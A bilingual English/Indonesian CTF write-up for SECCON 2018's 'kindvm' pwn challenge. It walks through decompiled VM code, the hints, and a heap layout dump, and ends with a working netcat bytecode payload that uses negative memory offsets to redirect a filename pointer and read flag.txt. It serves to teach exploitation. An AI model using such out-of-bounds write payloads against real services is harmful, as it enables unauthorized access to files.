
# kindvm
**Points:** 255 | **Solves:** 64/653 | **Category:** Pwn

Get hints, and pwn it! kindvm.pwn.seccon.jp 12345



[Bahasa Indonesia](#bahasa-indonesia)

## English
Input your name : a
Input instruction : a
_ _ _
| | _(_)_ __ __| |_ ___ __ ___
| |/ / | '_ \ / _` \ \ / / '_ ` _ \
| <| | | | | (_| |\ V /| | | | | |
|_|\_\_|_| |_|\__,_| \_/ |_| |_| |_|

Instruction start!
Error! Try again!

The binary takes instructions as input (per-byte) and run it.
Here are the instructions.
0 -> insn_nop;
1 -> insn_load;
2 -> insn_store;
3 -> insn_mov;
4 -> insn_add;
5 -> insn_sub;
6 -> insn_halt;
7 -> insn_in;
8 -> insn_out;
9 -> insn_hint;

Wait, the binary have gets in input name!
Let's exploit it!
char *input_username()
char *dest; // ST18_4
size_t v1; // eax
char s; // [esp+12h] [ebp-16h]
unsigned int v4; // [esp+1Ch] [ebp-Ch]

v4 = __readgsdword(0x14u);
printf("Input your name : ");
dest = (char *)malloc(0xAu);
v1 = strlen(&s);
dest[9] = 0;
strncpy(dest, &s, v1);
return dest;

Input your name : aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
_ _ _ _ _ ____ _____ _____ _
| | | (_)_ __ | |_/ | / ___| ____|_ _| | |
| |_| | | '_ \| __| | | | _| _| | | | |
| _ | | | | | |_| | | |_| | |___ | | |_|
|_| |_|_|_| |_|\__|_| \____|_____| |_| (_)

Nice try! The theme of this binary is not Stack-Based BOF!
However, your name is not meaningless...

Okay, moving on. Let's just call instruction 9 (hint).
asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x09\n' | nc kindvm.pwn.seccon.jp 12345
Input your name : Input instruction : _ _ _
| | _(_)_ __ __| |_ ___ __ ___
| |/ / | '_ \ / _` \ \ / / '_ ` _ \
| <| | | | | (_| |\ V /| | | | | |
|_|\_\_|_| |_|\__,_| \_/ |_| |_| |_|

Instruction start!
_ _ _ _ ____ ____ _____ _____ _
| | | (_)_ __ | |_|___ \ / ___| ____|_ _| | |
| |_| | | '_ \| __| __) | | | _| _| | | | |
| _ | | | | | |_ / __/ | |_| | |___ | | |_|
|_| |_|_|_| |_|\__|_____| \____|_____| |_| (_)

Nice try! You can analyze vm instruction and execute it!
Flag file name is "flag.txt".

We also see a third hint in the binary (insn_add).
_DWORD *insn_add()
_DWORD *result; // eax
unsigned __int8 v1; // [esp+Ah] [ebp-Eh]
unsigned __int8 v2; // [esp+Bh] [ebp-Dh]
signed int v3; // [esp+Ch] [ebp-Ch]

v1 = load_insn_uint8_t();
v2 = load_insn_uint8_t();
if ( v1 > 7u )
if ( v2 > 7u )
if ( *((_DWORD *)reg + v1) >= 0 )
v3 = 1;
result = (char *)reg + 4 * v1;
*result += *((_DWORD *)reg + v2);
if ( v3 )
result = (_DWORD *)*((_DWORD *)reg + v1);
if ( (signed int)result < 0 )
return result;

It requires user to have reg + v1 of negative value. Let's try to load by `in` (7) function.
int insn_in()
int result; // eax
unsigned __int8 v1; // [esp+Bh] [ebp-Dh]
int v2; // [esp+Ch] [ebp-Ch]

v1 = load_insn_uint8_t();
v2 = load_insn_uint32_t();
if ( v1 > 7u )
result = v2;
*((_DWORD *)reg + v1) = v2;
return result;

int load_insn_uint32_t()
unsigned __int8 *v0; // ebx
int v1; // ST0C_4
unsigned __int8 *v2; // ebx
int v3; // ST0C_4
unsigned __int8 *v4; // ebx
int v5; // ST0C_4
unsigned __int8 *v6; // ebx
int v7; // ST0C_4

v0 = (unsigned __int8 *)insn;
v1 = v0[get_pc()];
v2 = (unsigned __int8 *)insn;
v3 = v2[get_pc()] + (v1 << 8);
v4 = (unsigned __int8 *)insn;
v5 = v4[get_pc()] + (v3 << 8);
v6 = (unsigned __int8 *)insn;
v7 = v6[get_pc()] + (v5 << 8);
return v7;

Okay. So, we need to input register (0 - 7) and number (first input is the most significant byte).
Let's do reg0 = 0xffffffff and then add r0 to r0 -> r0 = -1 + -1 = -2 (still negative).
asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x07\x00\xff\xff\xff\xff\x04\x00\x00\n' | nc kindvm.pwn.seccon.jp 12345
Input your name : Input instruction : _ _ _
| | _(_)_ __ __| |_ ___ __ ___
| |/ / | '_ \ / _` \ \ / / '_ ` _ \
| <| | | | | (_| |\ V /| | | | | |
|_|\_\_|_| |_|\__,_| \_/ |_| |_| |_|

Instruction start!
_ _ _ _ _____ ____ _____ _____ _
| | | (_)_ __ | |_|___ / / ___| ____|_ _| | |
| |_| | | '_ \| __| |_ \ | | _| _| | | | |
| _ | | | | | |_ ___) | | |_| | |___ | | |_|
|_| |_|_|_| |_|\__|____/ \____|_____| |_| (_)

Nice try! You can cause Integer Overflow!
The value became minus value. Minus value is important.

Nice, we got (maybe) all the hints. Now, we just need to read `flag.txt`.
Some notes, `reg` is stored in heap. There is also `mem` stored in heap. We can store and load `mem` with the instruction load and store.

The hint states about integer overflow, so maybe integer overflow in heap.
Let's see what else is in the heap.
v0 = malloc(0x18u);
kc = (int)v0;
*v0 = 0;
*(_DWORD *)(kc + 4) = 0;
v1 = kc;
*(_DWORD *)(v1 + 8) = input_username();
*(_DWORD *)(kc + 12) = "banner.txt";
*(_DWORD *)(kc + 16) = func_greeting;
*(_DWORD *)(kc + 20) = func_farewell;
mem = malloc(0x400u);
memset(mem, 0, 0x400u);
reg = malloc(0x20u);
memset(reg, 0, 0x20u);
insn = malloc(0x400u);
result = memset(mem, 65, 0x400u);

So, username is in the heap (hint says it is useful), also banner.txt, func_greeting, and func_farewell.
If we can overflow and write in the heap then maybe we can change func_farewell to execute anything.
Let's see what func_farewell does.
ssize_t func_farewell()
open_read_write(*(char **)(kc + 12));
return write(1, "Execution is end! Thank you!\n", 0x1Du);

It reads `kc+12` which is `banner.txt` and writes it!
Well then, if we can change `kc+12` to `flag.txt` by rewriting it to `name` (filled with `flag.txt`), we will get the flag.
Let's see the heap then.
gdb-peda$ x/20wx 0x804c168
0x804c168: 0x0804c180 <= name 0x080491b2 <= banner.txt 0x08048f89 <= greeting 0x08048fba <= farewell
0x804c178: 0x00000000 0x00000011 0x00000000 0x00000000
0x804c188: 0x00000000 0x00000411 0x41414141 <= mem_start 0x41414141
0x804c198: 0x41414141 0x41414141 0x41414141 0x41414141
0x804c1a8: 0x41414141 0x41414141 0x41414141 0x41414141

Plan: read `name` -> write it to `banner.txt`.
load mem-40 to reg0 -> store reg0 to mem-36

asdf@asdf:~/Desktop/CTF/ctf/seccon2018/classic-pwn$ echo -e 'flag.txt\n\x01\x00\xff\xd8\x02\xff\xdc\x00\x06' | nc kindvm.pwn.seccon.jp 12345
Input your name : Input instruction : _ _ _
| | _(_)_ __ __| |_ ___ __ ___
| |/ / | '_ \ / _` \ \ / / '_ ` _ \
| <| | | | | (_| |\ V /| | | | | |
|_|\_\_|_| |_|\__,_| \_/ |_| |_| |_|

Instruction start!
Execution is end! Thank you!
Flag is captured!

## Bahasa Indonesia
Input your name : a
Input instruction : a
_ _ _
| | _(_)_ __ __| |_ ___ __ ___
| |/ / | '_ \ / _` \ \ / / '_ ` _ \
| <| | | | | (_| |\ V /| | | | | |
|_|\_\_|_| |_|\__,_| \_/ |_| |_| |_|

Instruction start!
Error! Try again!

Program membaca input (1 instruksi 1 byte) dan menjalankannya.
Berikut instruksinya.
0 -> insn_nop;
1 -> insn_load;
2 -> insn_store;
3 -> insn_mov;
4 -> insn_add;
5 -> insn_sub;
6 -> insn_halt;
7 -> insn_in;
8 -> insn_out;
9 -> insn_hint;

Program memanggil `gets`! Dicoba buffer overflow.
char *input_username()
char *dest; // ST18_4
size_t v1; // eax
char s; // [esp+12h] [ebp-16h]
unsigned int v4; // [esp+1Ch] [ebp-Ch]

v4 = __readgsdword(0x14u);
printf("Input your name : ");
dest = (char *)malloc(0xAu);
v1 = strlen(&s);
dest[9] = 0;
strncpy(dest, &s, v1);
return dest;

Input your name : aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
_ _ _ _ _ ____ _____ _____ _
| | | (_)_ __ | |_/ | / ___| ____|_ _| | |
| |_| | | '_ \| __| | | | _| _| | | | |
| _ | | | | | |_| | | |_| | |___ | | |_|
|_| |_|_|_| |_|\__|_| \____|_____| |_| (_)

Nice try! The theme of this binary is not Stack-Based BOF!
However, your name is not meaningless...

Okay, lanjut. Mari panggil instruksi 9 (hint).
asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x09\n' | nc kindvm.pwn.seccon.jp 12345
Input your name : Input instruction : _ _ _
| | _(_)_ __ __| |_ ___ __ ___
| |/ / | '_ \ / _` \ \ / / '_ ` _ \
| <| | | | | (_| |\ V /| | | | | |
|_|\_\_|_| |_|\__,_| \_/ |_| |_| |_|

Instruction start!
_ _ _ _ ____ ____ _____ _____ _
| | | (_)_ __ | |_|___ \ / ___| ____|_ _| | |
| |_| | | '_ \| __| __) | | | _| _| | | | |
| _ | | | | | |_ / __/ | |_| | |___ | | |_|
|_| |_|_|_| |_|\__|_____| \____|_____| |_| (_)

Nice try! You can analyze vm instruction and execute it!
Flag file name is "flag.txt".

Dapat dilihat juga terdapat hint ketiga (insn_add).
_DWORD *insn_add()
_DWORD *result; // eax
unsigned __int8 v1; // [esp+Ah] [ebp-Eh]
unsigned __int8 v2; // [esp+Bh] [ebp-Dh]
signed int v3; // [esp+Ch] [ebp-Ch]

v1 = load_insn_uint8_t();
v2 = load_insn_uint8_t();
if ( v1 > 7u )
if ( v2 > 7u )
if ( *((_DWORD *)reg + v1) >= 0 )
v3 = 1;
result = (char *)reg + 4 * v1;
*result += *((_DWORD *)reg + v2);
if ( v3 )
result = (_DWORD *)*((_DWORD *)reg + v1);
if ( (signed int)result < 0 )
return result;

Untuk mendapaatkan hint nilai `reg + v1` harus negatif. Mari coba buat nilai reg negatif dengan fungsi `in` (7).
int insn_in()
int result; // eax
unsigned __int8 v1; // [esp+Bh] [ebp-Dh]
int v2; // [esp+Ch] [ebp-Ch]

v1 = load_insn_uint8_t();
v2 = load_insn_uint32_t();
if ( v1 > 7u )
result = v2;
*((_DWORD *)reg + v1) = v2;
return result;

int load_insn_uint32_t()
unsigned __int8 *v0; // ebx
int v1; // ST0C_4
unsigned __int8 *v2; // ebx
int v3; // ST0C_4
unsigned __int8 *v4; // ebx
int v5; // ST0C_4
unsigned __int8 *v6; // ebx
int v7; // ST0C_4

v0 = (unsigned __int8 *)insn;
v1 = v0[get_pc()];
v2 = (unsigned __int8 *)insn;
v3 = v2[get_pc()] + (v1 << 8);
v4 = (unsigned __int8 *)insn;
v5 = v4[get_pc()] + (v3 << 8);
v6 = (unsigned __int8 *)insn;
v7 = v6[get_pc()] + (v5 << 8);
return v7;

Jadi, kita perlu memasukkan register (0 - 7) dan nilainya pada input (byte pertama pada nilai paling signifikan).
Coba reg0 = 0xffffffff dan panggil add r0 ke r0 -> r0 = -1 + -1 = -2 (seharusnya nilai masih negatif).
asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x07\x00\xff\xff\xff\xff\x04\x00\x00\n' | nc kindvm.pwn.seccon.jp 12345
Input your name : Input instruction : _ _ _
| | _(_)_ __ __| |_ ___ __ ___
| |/ / | '_ \ / _` \ \ / / '_ ` _ \
| <| | | | | (_| |\ V /| | | | | |
|_|\_\_|_| |_|\__,_| \_/ |_| |_| |_|

Instruction start!
_ _ _ _ _____ ____ _____ _____ _
| | | (_)_ __ | |_|___ / / ___| ____|_ _| | |
| |_| | | '_ \| __| |_ \ | | _| _| | | | |
| _ | | | | | |_ ___) | | |_| | |___ | | |_|
|_| |_|_|_| |_|\__|____/ \____|_____| |_| (_)

Nice try! You can cause Integer Overflow!
The value became minus value. Minus value is important.

Yay, dapat (mungkin) semua hint. Sekarang kita perlu membaca `flag.txt`.
Beberapa keterangan, `reg` disimpan pada heap. Selain itu ada juga `mem` yang juga disimpan di heap. Kita dapat menggunakan `mem` dengan fungsi load dan store.

Hint yaitu integer overflow, mungkin integer overflow pada heap.
Dicek apa saja yang terdapat pada heap.
v0 = malloc(0x18u);
kc = (int)v0;
*v0 = 0;
*(_DWORD *)(kc + 4) = 0;
v1 = kc;
*(_DWORD *)(v1 + 8) = input_username();
*(_DWORD *)(kc + 12) = "banner.txt";
*(_DWORD *)(kc + 16) = func_greeting;
*(_DWORD *)(kc + 20) = func_farewell;
mem = malloc(0x400u);
memset(mem, 0, 0x400u);
reg = malloc(0x20u);
memset(reg, 0, 0x20u);
insn = malloc(0x400u);
result = memset(mem, 65, 0x400u);

Jadi, username terdapat pada heap (kata hint username penting), terdapat juga banner.txt, func_greeting, dan func_farewell pada heap.
Apabila kita dapat menulis dengan overflow pada heap, maka kita dapat mengubah func_farewell untuk mengeksekusi apapun.
Sebelumnya, dicek kegunaan func_farewell.
ssize_t func_farewell()
open_read_write(*(char **)(kc + 12));
return write(1, "Execution is end! Thank you!\n", 0x1Du);

Fungsi tersebut membaca `kc+12` yang adalah `banner.txt` dan menulisnya!
Jadi, jika kita ubah `kc+12` menjadi `flag.txt` dengan mengganti menjadi `name` (berisi `flag.txt`), kita dapat flag.
Let's see the heap then.
gdb-peda$ x/20wx 0x804c168
0x804c168: 0x0804c180 <= name 0x080491b2 <= banner.txt 0x08048f89 <= greeting 0x08048fba <= farewell
0x804c178: 0x00000000 0x00000011 0x00000000 0x00000000
0x804c188: 0x00000000 0x00000411 0x41414141 <= mem_start 0x41414141
0x804c198: 0x41414141 0x41414141 0x41414141 0x41414141
0x804c1a8: 0x41414141 0x41414141 0x41414141 0x41414141

Rencana: baca `name` -> tulis ke `banner.txt`.
load mem-40 to reg0 -> store reg0 to mem-36

asdf@asdf:~/Desktop/CTF/ctf/seccon2018/classic-pwn$ echo -e 'flag.txt\n\x01\x00\xff\xd8\x02\xff\xdc\x00\x06' | nc kindvm.pwn.seccon.jp 12345
Input your name : Input instruction : _ _ _
| | _(_)_ __ __| |_ ___ __ ___
| |/ / | '_ \ / _` \ \ / / '_ ` _ \
| <| | | | | (_| |\ V /| | | | | |
|_|\_\_|_| |_|\__,_| \_/ |_| |_| |_|

Instruction start!
Execution is end! Thank you!
Flag didapatkan!

Original writeup (https://github.com/PDKT-Team/ctf/tree/master/seccon2018/kindvm).